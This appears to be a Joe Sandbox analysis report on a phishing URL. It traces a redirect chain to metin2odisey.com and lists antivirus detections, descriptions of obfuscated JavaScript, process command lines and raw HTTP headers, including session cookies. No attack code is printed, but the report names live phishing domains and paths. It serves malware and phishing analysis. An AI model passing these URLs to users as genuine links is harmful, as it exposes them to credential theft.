Edit tour

Windows Analysis Report
https://dtrnconsulta.com/hnvwk

Overview

General Information

Sample URL:	https://dtrnconsulta.com/hnvwk
Analysis ID:	1593135
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

AI detected suspicious Javascript

Detected suspicious crossdomain redirect

HTML page contains hidden javascript code

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2140,i,14077100606901217665,11890294858342083006,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dtrnconsulta.com/hnvwk" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2145603863:1737058317:VtFr33mDKD2pn-nQny-_tCmIPBAIaigR746xGJkyGW0/903112caee240c7a/PTYT7zyAOgo4VQZL8cUrMiwLdB9mssZcDsY4P22_G_8-1737061628-1.2.1.1-C0fUZxc3UPnEu3f6WwwEhDcPUpw4AqAzQgxfH8xFyAY58K8yPhjKmCmaMr2B7Rig	Avira URL Cloud: Label: phishing
Source: https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/672eb098a9f3/main.js?	Avira URL Cloud: Label: phishing
Source: https://metin2odisey.com/cdn-cgi/challenge-platform/scripts/jsd/main.js	Avira URL Cloud: Label: phishing
Source: https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=903112caee240c7a	Avira URL Cloud: Label: phishing
Source: https://metin2odisey.com/favicon.ico	Avira URL Cloud: Label: phishing

Phishing

AI detected suspicious Javascript

Source: 1.9.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://metin2odisey.com/verytrue/... This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `eval`, `Function` constructor, and heavily encoded strings indicates a high likelihood of malicious intent. Additionally, the script appears to be sending user data to external domains, which raises concerns about data privacy and security. Overall, this script demonstrates a clear pattern of suspicious and potentially harmful activities, warranting a high-risk score.
Source: 1.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://fortishomebuilders.com/... This script demonstrates high-risk behavior by attempting to redirect the user to an external domain, potentially for malicious purposes. The use of the `window.onerror` event handler to trigger the `process()` function is also concerning, as it could be used to intercept and handle errors in a way that compromises the user's security. Overall, this script exhibits behaviors that are highly suspicious and potentially malicious.

Source: https://metin2odisey.com/verytrue/

HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....

Source: https://dtrnconsulta.com/hnvwk	HTTP Parser: No favicon
Source: https://metin2odisey.com/verytrue/	HTTP Parser: No favicon
Source: https://metin2odisey.com/verytrue/	HTTP Parser: No favicon
Source: https://metin2odisey.com/verytrue/	HTTP Parser: No favicon
Source: https://metin2odisey.com/verytrue/	HTTP Parser: No favicon

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: metin2odisey.com to https://href.li/?https://en.wikipedia.org/wiki/client_access_license#dummybot

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /hnvwk HTTP/1.1Host: dtrnconsulta.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dtrnconsulta.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dtrnconsulta.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: fortishomebuilders.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /verytrue/ HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://fortishomebuilders.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /verytrue/ HTTP/1.1Host: metin2odisey.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://fortishomebuilders.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=903112caee240c7a HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://metin2odisey.com/verytrue/?__cf_chl_rt_tk=f970zw3KAn9h5CNGwUP4ucVHF3Sp5YVkI.J0J9hMAHw-1737061628-1.0.1.1-t4obkpJnuet9MSI1y7ODqemeXtxZ8R8jeCrEDqTp3e8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/672eb098a9f3/api.js?onload=nAlgo7&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://metin2odisey.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=903112caee240c7a HTTP/1.1Host: metin2odisey.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://metin2odisey.com/verytrue/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/672eb098a9f3/api.js?onload=nAlgo7&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2145603863:1737058317:VtFr33mDKD2pn-nQny-_tCmIPBAIaigR746xGJkyGW0/903112caee240c7a/PTYT7zyAOgo4VQZL8cUrMiwLdB9mssZcDsY4P22_G_8-1737061628-1.2.1.1-C0fUZxc3UPnEu3f6WwwEhDcPUpw4AqAzQgxfH8xFyAY58K8yPhjKmCmaMr2B7Rig HTTP/1.1Host: metin2odisey.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3djd5/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=903112e0daeb0c84&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3djd5/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3djd5/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=903112e0daeb0c84&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://metin2odisey.com/verytrue/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2031134020:1737058434:c-z86qu5zQeSlhcF_YB19pGLXXUhcvHTmjc4CYkbnEw/903112e0daeb0c84/DvnHb7CL7RSAt_vpM7SLK34ur5KjtWnxycs6RyWN8qE-1737061632-1.1.1.1-k9XgdELB3bNTs8JW_P6fjLXB5bNHz2is_tzzqacb5ysIDE2msYnPrQn8ZVXg9hZy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/903112e0daeb0c84/1737061634197/qfMRqOc8eRxuhhn HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3djd5/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/903112e0daeb0c84/1737061634197/qfMRqOc8eRxuhhn HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/903112e0daeb0c84/1737061634198/9bc8e4a6714402bad0f9db6672079c2e5fe4b6d9be67268acd6c9770ef20e617/rF1jR65NlXmLXQJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3djd5/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2031134020:1737058434:c-z86qu5zQeSlhcF_YB19pGLXXUhcvHTmjc4CYkbnEw/903112e0daeb0c84/DvnHb7CL7RSAt_vpM7SLK34ur5KjtWnxycs6RyWN8qE-1737061632-1.1.1.1-k9XgdELB3bNTs8JW_P6fjLXB5bNHz2is_tzzqacb5ysIDE2msYnPrQn8ZVXg9hZy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2031134020:1737058434:c-z86qu5zQeSlhcF_YB19pGLXXUhcvHTmjc4CYkbnEw/903112e0daeb0c84/DvnHb7CL7RSAt_vpM7SLK34ur5KjtWnxycs6RyWN8qE-1737061632-1.1.1.1-k9XgdELB3bNTs8JW_P6fjLXB5bNHz2is_tzzqacb5ysIDE2msYnPrQn8ZVXg9hZy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2145603863:1737058317:VtFr33mDKD2pn-nQny-_tCmIPBAIaigR746xGJkyGW0/903112caee240c7a/PTYT7zyAOgo4VQZL8cUrMiwLdB9mssZcDsY4P22_G_8-1737061628-1.2.1.1-C0fUZxc3UPnEu3f6WwwEhDcPUpw4AqAzQgxfH8xFyAY58K8yPhjKmCmaMr2B7Rig HTTP/1.1Host: metin2odisey.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://metin2odisey.com/verytrue/?__cf_chl_tk=f970zw3KAn9h5CNGwUP4ucVHF3Sp5YVkI.J0J9hMAHw-1737061628-1.0.1.1-t4obkpJnuet9MSI1y7ODqemeXtxZ8R8jeCrEDqTp3e8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=RG7vAuKIucy36dS8vs57JBarXy4QfrOcDqulZhT53SE-1737061628-1.2.1.1-IVnPSo8vQQ9i7HMBP50ZBOl72i9TRpPBq109HfinZPAIuu0O98ztQmdO_LGVLgg8ZM6nQco9p9OutTgRJ7KNRsmzVPLdLww0aNOGDdQvIxy1j.h5DHsofBfeIXPk.6DSOF4GYzdpUt5dBIWwK_C0IO6wgA4SyechR3fNt5ib_tSqPpW4wtfwkTUNiCphemb90I8V8.gyEdgsC_frMvL9HrDAPxeETSbCJFo_kMOayhFdZF8Nyymog2Yv3KRp6tK9NqBBGfnhXHAaGBXX7B5a6OYYEAHhXkpJWVWsiHispHiRd1JJPE6ikqKh7lCoOD0I0EcfY1Syd1leas8yv5oB1g; PHPSESSID=04162e6f1573dff742842cd1a6c4665c
